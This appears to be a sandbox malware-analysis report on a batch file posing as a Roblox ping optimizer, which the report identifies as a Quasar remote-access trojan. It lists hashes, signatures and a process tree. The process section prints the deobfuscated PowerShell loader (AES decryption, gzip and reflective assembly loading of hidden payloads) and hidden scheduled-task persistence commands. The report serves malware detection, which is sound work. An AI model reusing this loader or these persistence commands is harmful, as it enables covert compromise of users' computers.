Analysis
-
max time kernel
138s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
27-06-2024 23:51
Static task
static1
Behavioral task
behavioral1
Sample
RobloxPingOptimizer.bat
Resource
win7-20240221-en
General
-
Target
RobloxPingOptimizer.bat
-
Size
273KB
-
MD5
0d3e0553b13ae24b0e765dc71b71d157
-
SHA1
2e7ea67463d79b9047aa843210667ac11da4650d
-
SHA256
3d532f4155981fbaf60ddbaf14851a4b12d1066cbd182144ad0bdcd0b0f379a6
-
SHA512
43b0250496746f8c161d3009f0842d2758eb80196ce7bc5e4f05a1ac552ae86ebece4fcb42a6b4f52be7981e01782817c56d12017d70c77e34327f63433a5da0
-
SSDEEP
6144:ymjeUWzu9cgBXKz1IQDKHkaIFH4zfWHF0QR1rh3Og2q4E:yseUWq9cgBazioKkaIEfOFtR1rh3Z2S
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1660-90-0x0000000005070000-0x00000000050CE000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 51 1660 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 3444 powershell.exe 696 powershell.exe 1660 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
Processes:
Runtime Broker.exepid process 624 Runtime Broker.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 50 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exepowershell.exepowershell.exeRuntime Broker.exepid process 3444 powershell.exe 3444 powershell.exe 696 powershell.exe 696 powershell.exe 696 powershell.exe 1660 powershell.exe 1660 powershell.exe 1660 powershell.exe 624 Runtime Broker.exe 624 Runtime Broker.exe 624 Runtime Broker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3444 powershell.exe Token: SeDebugPrivilege 696 powershell.exe Token: SeIncreaseQuotaPrivilege 696 powershell.exe Token: SeSecurityPrivilege 696 powershell.exe Token: SeTakeOwnershipPrivilege 696 powershell.exe Token: SeLoadDriverPrivilege 696 powershell.exe Token: SeSystemProfilePrivilege 696 powershell.exe Token: SeSystemtimePrivilege 696 powershell.exe Token: SeProfSingleProcessPrivilege 696 powershell.exe Token: SeIncBasePriorityPrivilege 696 powershell.exe Token: SeCreatePagefilePrivilege 696 powershell.exe Token: SeBackupPrivilege 696 powershell.exe Token: SeRestorePrivilege 696 powershell.exe Token: SeShutdownPrivilege 696 powershell.exe Token: SeDebugPrivilege 696 powershell.exe Token: SeSystemEnvironmentPrivilege 696 powershell.exe Token: SeRemoteShutdownPrivilege 696 powershell.exe Token: SeUndockPrivilege 696 powershell.exe Token: SeManageVolumePrivilege 696 powershell.exe Token: 33 696 powershell.exe Token: 34 696 powershell.exe Token: 35 696 powershell.exe Token: 36 696 powershell.exe Token: SeIncreaseQuotaPrivilege 696 powershell.exe Token: SeSecurityPrivilege 696 powershell.exe Token: SeTakeOwnershipPrivilege 696 powershell.exe Token: SeLoadDriverPrivilege 696 powershell.exe Token: SeSystemProfilePrivilege 696 powershell.exe Token: SeSystemtimePrivilege 696 powershell.exe Token: SeProfSingleProcessPrivilege 696 powershell.exe Token: SeIncBasePriorityPrivilege 696 powershell.exe Token: SeCreatePagefilePrivilege 696 powershell.exe Token: SeBackupPrivilege 696 powershell.exe Token: SeRestorePrivilege 696 powershell.exe Token: SeShutdownPrivilege 696 powershell.exe Token: SeDebugPrivilege 696 powershell.exe Token: SeSystemEnvironmentPrivilege 696 powershell.exe Token: SeRemoteShutdownPrivilege 696 powershell.exe Token: SeUndockPrivilege 696 powershell.exe Token: SeManageVolumePrivilege 696 powershell.exe Token: 33 696 powershell.exe Token: 34 696 powershell.exe Token: 35 696 powershell.exe Token: 36 696 powershell.exe Token: SeIncreaseQuotaPrivilege 696 powershell.exe Token: SeSecurityPrivilege 696 powershell.exe Token: SeTakeOwnershipPrivilege 696 powershell.exe Token: SeLoadDriverPrivilege 696 powershell.exe Token: SeSystemProfilePrivilege 696 powershell.exe Token: SeSystemtimePrivilege 696 powershell.exe Token: SeProfSingleProcessPrivilege 696 powershell.exe Token: SeIncBasePriorityPrivilege 696 powershell.exe Token: SeCreatePagefilePrivilege 696 powershell.exe Token: SeBackupPrivilege 696 powershell.exe Token: SeRestorePrivilege 696 powershell.exe Token: SeShutdownPrivilege 696 powershell.exe Token: SeDebugPrivilege 696 powershell.exe Token: SeSystemEnvironmentPrivilege 696 powershell.exe Token: SeRemoteShutdownPrivilege 696 powershell.exe Token: SeUndockPrivilege 696 powershell.exe Token: SeManageVolumePrivilege 696 powershell.exe Token: 33 696 powershell.exe Token: 34 696 powershell.exe Token: 35 696 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 3868 wrote to memory of 5076 3868 cmd.exe cmd.exe PID 3868 wrote to memory of 5076 3868 cmd.exe cmd.exe PID 3868 wrote to memory of 3444 3868 cmd.exe powershell.exe PID 3868 wrote to memory of 3444 3868 cmd.exe powershell.exe PID 3868 wrote to memory of 3444 3868 cmd.exe powershell.exe PID 3444 wrote to memory of 696 3444 powershell.exe powershell.exe PID 3444 wrote to memory of 696 3444 powershell.exe powershell.exe PID 3444 wrote to memory of 696 3444 powershell.exe powershell.exe PID 3444 wrote to memory of 4232 3444 powershell.exe WScript.exe PID 3444 wrote to memory of 4232 3444 powershell.exe WScript.exe PID 3444 wrote to memory of 4232 3444 powershell.exe WScript.exe PID 4232 wrote to memory of 2988 4232 WScript.exe cmd.exe PID 4232 wrote to memory of 2988 4232 WScript.exe cmd.exe PID 4232 wrote to memory of 2988 4232 WScript.exe cmd.exe PID 2988 wrote to memory of 4900 2988 cmd.exe cmd.exe PID 2988 wrote to memory of 4900 2988 cmd.exe cmd.exe PID 2988 wrote to memory of 4900 2988 cmd.exe cmd.exe PID 2988 wrote to memory of 1660 2988 cmd.exe powershell.exe PID 2988 wrote to memory of 1660 2988 cmd.exe powershell.exe PID 2988 wrote to memory of 1660 2988 cmd.exe powershell.exe PID 1660 wrote to memory of 1552 1660 powershell.exe schtasks.exe PID 1660 wrote to memory of 1552 1660 powershell.exe schtasks.exe PID 1660 wrote to memory of 1552 1660 powershell.exe schtasks.exe PID 1660 wrote to memory of 624 1660 powershell.exe Runtime Broker.exe PID 1660 wrote to memory of 624 1660 powershell.exe Runtime Broker.exe PID 1660 wrote to memory of 624 1660 powershell.exe Runtime Broker.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1wL4kmOdB2R3iGa/mEDXbQunvSUVKGrVuRrft2dp9pw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BFwaf2FXZug80opDTZLBSA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HKEwQ=New-Object System.IO.MemoryStream(,$param_var); $kVcOJ=New-Object System.IO.MemoryStream; $eLOZz=New-Object System.IO.Compression.GZipStream($HKEwQ, [IO.Compression.CompressionMode]::Decompress); $eLOZz.CopyTo($kVcOJ); $eLOZz.Dispose(); $HKEwQ.Dispose(); $kVcOJ.Dispose(); $kVcOJ.ToArray();}function execute_function($param_var,$param2_var){ $YpwEB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XnPgt=$YpwEB.EntryPoint; $XnPgt.Invoke($null, $param2_var);}$tHcqT = 'C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer.bat';$host.UI.RawUI.WindowTitle = $tHcqT;$AjwOC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tHcqT).Split([Environment]::NewLine);foreach ($vriJL in $AjwOC) { if ($vriJL.StartsWith('jwbKUUEoLPvvJlZYWdJd')) { $srAUX=$vriJL.Substring(20); break; }}$payloads_var=[string[]]$srAUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:5076
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_531_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_531.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:696 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_531.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_531.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1wL4kmOdB2R3iGa/mEDXbQunvSUVKGrVuRrft2dp9pw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BFwaf2FXZug80opDTZLBSA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HKEwQ=New-Object System.IO.MemoryStream(,$param_var); $kVcOJ=New-Object System.IO.MemoryStream; $eLOZz=New-Object System.IO.Compression.GZipStream($HKEwQ, [IO.Compression.CompressionMode]::Decompress); $eLOZz.CopyTo($kVcOJ); $eLOZz.Dispose(); $HKEwQ.Dispose(); $kVcOJ.Dispose(); $kVcOJ.ToArray();}function execute_function($param_var,$param2_var){ $YpwEB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XnPgt=$YpwEB.EntryPoint; $XnPgt.Invoke($null, $param2_var);}$tHcqT = 'C:\Users\Admin\AppData\Roaming\Windows_Log_531.bat';$host.UI.RawUI.WindowTitle = $tHcqT;$AjwOC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tHcqT).Split([Environment]::NewLine);foreach ($vriJL in $AjwOC) { if ($vriJL.StartsWith('jwbKUUEoLPvvJlZYWdJd')) { $srAUX=$vriJL.Substring(20); break; }}$payloads_var=[string[]]$srAUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵PID:4900
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:1552 -
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:624
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3692 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:81⤵PID:2256
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59751fcb3d8dc82d33d50eebe53abe314
SHA17a680212700a5d9f3ca67c81e0e243834387c20c
SHA256ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7
SHA51254907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709
-
Filesize
54KB
MD50065725c9d081c44d135633017955c85
SHA1725a215e1c4ca516055329b828f496d10bc91fae
SHA25673d364c8e5abfe6906ce02b1263b5589f3dfa3d21432035f2f7cc3e07f1c7d64
SHA5127f05c2bef07dce58fbe0a0b887afbfec8c29da6e66b4fcabe809ae3c894577030202b8952eb3a257b9566afed18e115445a720c23257c6d72118973932e5d338
-
Filesize
53KB
MD53337d66209faa998d52d781d0ff2d804
SHA16594b85a70f998f79f43cdf1ca56137997534156
SHA2569b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd
SHA5128bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f
-
Filesize
20KB
MD5c75eea7f8f4f5a2317a03fb20d4d0020
SHA1800dbab12422f9fed695ef01a3c99658b53b2c69
SHA256de99116c239ff025a10ba52a069ec9a437b311889f33a352a5e1ef2672945278
SHA5129ae9a4a75762b1e4b17870e9ddffc5b1e91dea5c3cd2daa2862e305889c643cf554e8d03b61557f9ee2b2320bc2763ca2768e576d89d8f7508033a1856ef1e30
-
Filesize
20KB
MD57d915cabb022dd7386c9801ff38a7979
SHA1bae663811540c983ef70c9e126421598cc45c3df
SHA2566cbae7b42ff76f4477cc2a14f1f1e71c61712cd4eb0d6abf9e81b9758ce4563c
SHA51229e4ed6b2bf14a5edab7e33dee87f8675f2993666d4d9fef7a08e795ad02c13946884324b7985672efb74225ad0095a7dfe488d0a1175ef673a344254882d97b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
273KB
MD50d3e0553b13ae24b0e765dc71b71d157
SHA12e7ea67463d79b9047aa843210667ac11da4650d
SHA2563d532f4155981fbaf60ddbaf14851a4b12d1066cbd182144ad0bdcd0b0f379a6
SHA51243b0250496746f8c161d3009f0842d2758eb80196ce7bc5e4f05a1ac552ae86ebece4fcb42a6b4f52be7981e01782817c56d12017d70c77e34327f63433a5da0
-
Filesize
115B
MD5a82060ea9c9aa0e21e5e1806cad35e58
SHA174d92fc6653bef957e0b85c913fbf72c30488542
SHA256650fff60e15bc7adff9045c8193f5af77f0ad3a66c98b87fae7cb22797134c34
SHA5121cc8110f462dc46f2a56609a5f0c7acd362d0e9eba14fea8134322508f3c9f63cbba0b3c95a51a9ca5700535ddb95eee5f0e550a74cc9cf2314d253417e164a6